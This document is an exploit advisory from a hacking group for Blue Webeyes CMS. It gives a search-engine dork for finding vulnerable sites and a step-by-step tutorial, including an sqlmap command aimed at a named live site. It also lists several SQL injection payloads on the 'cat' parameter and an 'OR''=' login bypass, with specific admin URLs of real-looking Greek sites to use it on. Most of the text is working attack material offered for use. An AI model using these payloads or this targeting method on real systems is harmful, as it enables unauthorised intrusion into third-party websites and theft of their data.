################################################################################# # Exploit Title: Blue Webeyes Admin Panel Bypass And Sql İnjection Vulnerability # Author : TrazeR & Sipahiler & TurkZ.org # Google Dork :Powered by Blue Webeyes 0R "Powered by Blue Webeyes" inurl:php? OR Created and Supported by Blue Webeyes © 2006 # Tested on : Kali Linux 2018 Chrome # Date : 01.02.2018 # Vendor Home: N/A # Blog : http://www.trazer.org/ # Forum : http://www.turkz.org/Forum/ # Telegram: https://t.me/turkzgrup ################################################################################# Tutorial : [+] Dorking İn Google Or Other Search Enggine [+] Open Target [+] /admin/ [+] /admin/index.php [+] Sql GET parameter 'cat' is vulnerable Command:root@TrazeR:~# sqlmap --random-agent --timeout=10 --time-sec=2 --threads=10 --hex --level=5 --risk=3 -u "http://www.armytrucks.gr/armytrucks.php?cat=182&rec=151" --batch --tamper=between --dbs Parameter: cat (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cat=182 AND 5640=5640# yWfg&rec=151 Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: cat=182 AND EXTRACTVALUE(1627,CONCAT(0x5c,0x7162626a71,(SELECT (ELT(1627=1627,1))),0x717a766271))# qMae&rec=151 Type: AND/OR time-based blind Title: MySQL <= 5.0.11 OR time-based blind (heavy query - comment) Payload: cat=182 OR 5513=BENCHMARK(2000000,MD5(0x7a6b6a5a))#&rec=151 Demo: Sql: http://armyradio.gr/armyradio.php?cat=87&rec=232' http://www.armytrucks.gr/armytrucks.php?cat=182&rec=151' ===> Username: 'OR''=' Password: 'OR''=' http://www.armytrucks.gr/admin/index.php http://armyradio.gr/admin/index.php Greet'Zzz : Darkcod3r & EfendiBey & Atabey & TrazeR & Zer0day & Göcebe & BlueTrojen & Göcebe & Ak_Bey